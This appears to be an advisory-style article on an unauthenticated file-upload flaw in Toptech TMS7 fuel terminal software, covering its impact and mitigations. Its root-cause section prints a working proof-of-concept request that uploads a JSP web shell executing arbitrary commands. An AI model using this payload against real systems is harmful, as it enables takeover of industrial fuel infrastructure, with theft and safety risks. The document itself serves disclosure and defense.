The Cybersecurity and Infrastructure Security Agency (CISA) has issued high-priority Industrial Control Systems advisory ICSA-26-272-02 alerting energy sector operators to 10 severe vulnerabilities impacting Toptech Systems TMS7 and TopHAT. The software platform, deployed across commercial petroleum bulk liquid terminals, pipeline hubs, and marine bunkering ports to automate fuel truck loading and custody transfer accounting, contains a critical unauthenticated remote code execution flaw (CVE-2026-70356, CVSS 9.8) that allows adversaries to manipulate industrial physical processes remotely.
The Role of TMS7 in Energy Bulk Terminal Operations
In petrochemical terminals, Terminal Management Systems (TMS) sit at the operational interface between business enterprise networks and physical operational technology. Toptech TMS7 interfaces directly with preset flow computers (such as AccuLoad and Smith Meter), emergency isolation valves, tank radar gauging systems, and truck bay loading arms.
When a tanker truck pulls into a terminal bay, TMS7 authenticates the driver, authorizes the exact volume and blend of refined fuel, opens safety solenoid valves, and generates official custody transfer tickets (Bills of Lading).
Root Cause Analysis: Unauthenticated File Upload (CWE-434)
The primary vulnerability, CVE-2026-70356, resides within the administrative reporting and document management module exposed on TCP ports 8080 and 8443.
The file upload endpoint fails to enforce session authentication checks and omits file extension validation. An attacker transmitting an HTTP POST request can upload arbitrary server-side script files (e.g., PHP, JSP, or executable binaries) directly into the web application root directory:
# PoC HTTP request demonstrating unauthenticated file upload
POST /tms7/upload/custom_report.jsp HTTP/1.1
Host: terminal-scada.energycorp.internal:8443
Content-Type: multipart/form-data; boundary=---------------------------974767299852498929531610575
Content-Length: 342
-----------------------------974767299852498929531610575
Content-Disposition: form-data; name="file"; filename="webshell.jsp"
Content-Type: application/octet-stream
<%@ page import="java.io.*" %>
<%
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
%>
-----------------------------974767299852498929531610575--
Once uploaded, navigating to /tms7/reports/webshell.jsp?cmd=whoami executes commands with the privileges of the underlying SCADA service account (frequently SYSTEM or root).
Physical Consequences of Terminal Hijacking
With root control over TMS7, adversaries can:
- Falsify Custody Transfer Volumes: Manipulate electronic meter calibration factors to siphon hundreds of thousands of gallons of petroleum without discrepancy alerts.
- Override Overfill Prevention Systems: Suppress high-high level alarm interlocks, leading to fuel tank overflows, vapor cloud formations, and acute fire hazards.
- Terminal Grid Disruption: Shut down loading rack communication lines, stranding commercial fuel delivery fleets across entire regional supply chains.
Mitigation Actions for Oil & Gas Asset Owners
- Apply Toptech Version 7.8: Immediately contact Toptech Systems technical support to obtain and deploy the patched TMS7 v7.8 build.
- Enforce Purdue Model Segmentation: Place TMS7 host servers strictly within Purdue Level 3 (Operations DMZ), blocking direct inbound TCP 8080/8443 routing from corporate enterprise IT networks.
- Deploy Network IDS Rules: Monitor internal terminal switches for unauthorized HTTP POST requests targeting
/tms7/upload/paths originating from non-authorized terminal client consoles.



